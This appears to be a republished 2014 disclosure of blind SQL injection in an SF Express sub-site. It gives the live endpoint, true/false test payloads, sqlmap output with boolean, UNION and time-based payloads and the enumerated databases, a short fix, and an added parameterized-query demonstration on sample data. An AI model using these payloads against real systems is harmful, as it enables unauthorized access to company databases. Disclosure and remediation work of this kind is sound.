
SQL injection vulnerability in an SF Express sub-site

2014-06-10 03:10
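An SF Express sub-site has a SQL injection vulnerability: blind, POST-based.

Injection point:

http://ows-dfppe.sf-express.com/ows-dfp/$%7Bpath%7D/coverage_area!getCoverageCityList.action

POST parameters:

regionName=98605&level=3&lang=sc&region=us

The regionName parameter is injectable.

POST data:

regionName=98605%25' aND 1236=1236 aND '%25'='&level=3&lang=sc&region=us

The response is normal, as shown in the figure:

POST data:

regionName=98605%25' aND 1256=1236 aND '%25'='&level=3&lang=sc&region=us

The response is abnormal.

Enumerating the databases with sqlmap: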
 

sqlmap identified the following injection points with a total of 38 HTTP(s) requests:
---
Place: POST
Parameter: regionName

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regionName=98605%' AND 2644=2644 AND '%'='&level=3&lang=sc&region=us

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: regionName=98605%' UNION ALL SELECT NULL,CONCAT(0x7174797371,0x44644d4352736b48514e,0x716c697871)#&level=3&lang=sc&region=us

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: regionName=98605%' AND SLEEP(5) AND '%'='&level=3&lang=sc&region=us
---
[12:56:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[12:56:43] [INFO] fetching database names
available databases [4]:
[*] information_schema
[*] mysql
[*] opencms
[*] test

[12:56:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 21 times
[12:56:43] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ows-dfppe.sf-express.com'

 

 
 
 
Fix:
Filter the input and use parameterized queries.
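
The payload shape above (closing a quote after a % and re-opening one before a trailing %) is consistent with regionName being concatenated into a LIKE '%...%' clause. The following is an added example, not code from the original post or from the affected site: it reproduces the normal/abnormal response difference on a constructed SQLite table and then runs the same lookup with a bound parameter and escaped LIKE wildcards. The table, column and function names are assumptions, and SQLite stands in for the MySQL back end.

```python
import sqlite3

# Decoded form of the two POST values shown above (%25 -> %).
TRUE_PAYLOAD = "98605%' aND 1236=1236 aND '%'='"
FALSE_PAYLOAD = "98605%' aND 1256=1236 aND '%'='"


def make_db():
    # Constructed sample data; schema is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE coverage_city (region_name TEXT, city TEXT)")
    db.executemany("INSERT INTO coverage_city VALUES (?, ?)",
                   [("98605", "City A"), ("10001", "City B")])
    return db


def lookup_concat(db, region_name):
    # Vulnerable pattern: the value is pasted inside the LIKE string literal,
    # so a quote in the input changes the structure of the WHERE clause.
    sql = ("SELECT city FROM coverage_city WHERE region_name LIKE '%"
           + region_name + "%'")
    return [row[0] for row in db.execute(sql)]


def escape_like(value, esc="\\"):
    # Filtering step: make % and _ in user input match literally.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_param(db, region_name):
    # Parameterized: the value is bound as data and never parsed as SQL.
    # (SQLite needs the explicit ESCAPE clause; MySQL escapes with \ by default.)
    sql = "SELECT city FROM coverage_city WHERE region_name LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(region_name) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    for label, value in [("plain", "98605"), ("1236=1236", TRUE_PAYLOAD),
                         ("1256=1236", FALSE_PAYLOAD), ("wildcard", "%")]:
        print(label, "concat:", lookup_concat(db, value),
              "param:", lookup_param(db, value))
```

With concatenation the two payloads return different result sets, which is the difference a blind test relies on; with the bound parameter both return nothing, and a bare % no longer matches every row.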
Source: www.2cto.com/Article/201406/307565.html
